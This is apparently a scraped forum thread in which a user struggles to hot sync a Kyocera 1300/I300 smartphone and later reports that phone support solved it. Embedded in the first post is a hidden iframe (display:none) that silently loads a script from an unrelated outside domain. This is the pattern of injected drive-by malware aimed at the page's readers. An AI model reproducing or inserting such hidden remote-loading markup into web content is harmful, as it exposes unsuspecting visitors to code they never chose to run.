    My 1300 still does not work!

    I am not 1300-literate. I have had this item for 2 months and I still cannot hot sync. I don't know the questions to ask and what to do. All I know is that I cannot use the 1300 except for the phone, an expensive phone. I followed your advice to replace the Outlook. I did that. Is there anywhere I can get assistance that walks me through this? I jsut want to get full use of it. Thanks.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

    Thanks for the listening ear. To all those who may feel frustrated and need real technical help, dial *2 on your I300 and ask Customer Service for web support. They walked me right through to a successful hot sync. It took time and some expert maneuvering on their part, but now I am a happy I300 user.:p
